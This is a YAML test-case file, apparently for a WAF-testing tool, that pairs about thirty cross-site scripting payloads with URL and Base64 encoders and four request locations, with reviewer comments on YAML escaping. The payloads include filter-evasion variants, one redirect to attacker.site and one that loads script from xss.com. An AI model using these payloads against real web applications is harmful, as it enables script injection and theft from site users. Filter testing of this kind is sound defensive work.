gitex2026/AttackSurface/dist/testcases/owasp/xss-scripting.yml
2026-04-24 19:18:37 +00:00


# XSS test-case definition: a list of raw payload strings, the encoders to
# apply to them, the request locations ("placeholder") they are put in, and
# the case type.
# NOTE(review): the payload/encoder/placeholder/type layout looks like a
# WAF-testing case file in which each payload is combined with each encoder
# and each placeholder -- confirm against the tool that consumes this file.
# NOTE(review): a hit here presumably means "the filter let the string
# through", not "the application is exploitable"; triage passes separately.
#
# Quoting matters for what is actually sent: plain and single-quoted entries
# are taken literally, while double-quoted entries are subject to YAML
# backslash-escape processing (see the notes on the last two payloads).
payload:
- <body onload=alert('test1')>
- <IMG SRC=j&#X41vascript:alert('test')>
- '"onwheel=ead(111)'
- __proto__[v-if]=_c.constructor('alert(1)')()
- sometext<svg onload=alert(document.domain)>?mimeType=text/html
- '"));if(!self.x)self.x=!alert(document.domain)}catch(e){}//'
- <img src=x onerror=alert(document.domain)>/all
- confirm.call(null,1)
- javascript:setInterval('ale'+'rt(document.domain)')
- javascript:setInterval('fet'+'ch(document.domain)')
- javascript:setInterval('con'+'firm(document.domain)')
- javascript:setInterval('prom'+'pt(document.domain)')
- alert.call(%20, "XSS");
- (alert)(1)
# NOTE(review): =RND= looks like a token the runner substitutes per request;
# if it is not substituted it is sent literally -- confirm.
- <svg/onload=alert(=RND=)//
- '"onClick="(prompt)(1)'
- "'>alert(1)</script><script/1='"
- '"//Onx=""//onfocus=prompt(1)>'
- '"Onx=() onMouSeoVer=prompt(1)>'
- '"OnCliCk="(prompt`1`)'
- prompt.call(null,1)
- alert.apply(null, [1])
# Already HTML-entity-encoded in the file (&lt; &equals; &gt;), before any
# encoder from the list below is applied.
- '&lt;svg/onload&equals;alert(1)&gt;'
# Plain scalar: the leading backslash is sent as a literal character.
- \"autof<x>ocus o<x>nfocus=alert<x>(1)//
# NOTE(review): this entry and the <<scr...> entry below reference external
# hosts (attacker.site, xss.com) that the test operator presumably does not
# control. If a payload is ever rendered in a browser during testing it would
# navigate to / load script from a third party; prefer a host you own or a
# reserved name such as example.com.
- '"><p only=1337 onmouseenter=window.location.href=//attacker.site>'
- '"><svg onmouseover="confirm&#0000000040document.domain)'
# Double-quoted: \0 is the YAML escape for a NUL byte, so the loaded payload
# contains a real 0x00 between "scr" and "ipt", not the two characters \ and 0.
- "<<scr\0ipt/src=http://xss.com/xss.js></script"
# NOTE(review): \' is not an escape defined by YAML 1.2 for double-quoted
# scalars; strict loaders reject the file, lenient ones yield a bare quote.
# Confirm how the consuming loader handles it, or single-quote the entry if a
# literal backslash is intended.
- "\'-alert(1)//"
# Encodings applied to the payloads; the names are interpreted by the
# consuming tool.
# NOTE(review): no unencoded/plain variant is listed -- confirm that raw
# payloads are covered by another case if that is wanted.
encoder:
- Base64Flat
- URL
# Request locations the payloads are placed in; by their names these are the
# URL path, a URL parameter, and form / multipart-form bodies -- confirm.
# NOTE(review): no header or JSON-body location is listed, so those input
# paths are not exercised by this case.
placeholder:
- URLPath
- URLParam
- HTMLForm
- HTMLMultipartForm
# Category label for this test case.
type: XSS